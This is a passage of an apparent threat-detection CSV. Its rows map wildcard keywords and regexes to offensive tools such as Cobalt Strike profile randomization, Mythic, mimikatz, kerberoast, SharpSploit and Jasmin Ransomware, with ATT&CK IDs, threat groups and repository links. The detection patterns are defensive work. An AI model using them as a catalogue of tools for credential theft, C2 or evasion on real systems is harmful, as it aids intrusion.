- T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.forums.123456.*",".{0,1000}\.forums\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.ftp.123456.*",".{0,1000}\.ftp\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.get_c2profile*",".{0,1000}\.get_c2profile.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*.go.123456.*",".{0,1000}\.go\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.groups.123456.*",".{0,1000}\.groups\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.help.123456.*",".{0,1000}\.help\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.HTA loader with .HTML extension for specific command*",".{0,1000}\.HTA\sloader\swith\s\.HTML\sextension\sfor\sspecific\scommand.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*.imap.123456.*",".{0,1000}\.imap\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.img.123456.*",".{0,1000}\.img\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.jpeg.jasmin*",".{0,1000}\.jpeg\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.jpg.exe*",".{0,1000}\.jpg\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.jpg.iso*",".{0,1000}\.jpg\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.jpg.jasmin*",".{0,1000}\.jpg\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.kb.123456.*",".{0,1000}\.kb\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.kerberoast.txt*",".{0,1000}\.kerberoast\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.kirbi *",".{0,1000}\.kirbi\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*.LateralMovement.PowerShellRemoting*",".{0,1000}\.LateralMovement\.PowerShellRemoting.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.LateralMovement.SCM.*",".{0,1000}\.LateralMovement\.SCM\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.LateralMovement.WMI.WMIExecute(*",".{0,1000}\.LateralMovement\.WMI\.WMIExecute\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.ldapdump.txt*",".{0,1000}\.ldapdump\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.link/links/windows/target/x86_64-pc-windows-gnu/release/link.exe*",".{0,1000}\.link\/links\/windows\/target\/x86_64\-pc\-windows\-gnu\/release\/link\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*.lists.123456.*",".{0,1000}\.lists\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.live.123456.*",".{0,1000}\.live\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.local.kirbi*",".{0,1000}\.local\.kirbi.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*.m.123456.*",".{0,1000}\.m\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.mail.123456.*",".{0,1000}\.mail\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.media.123456.*",".{0,1000}\.media\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.mobile.123456.*",".{0,1000}\.mobile\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.mysql.123456.*",".{0,1000}\.mysql\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 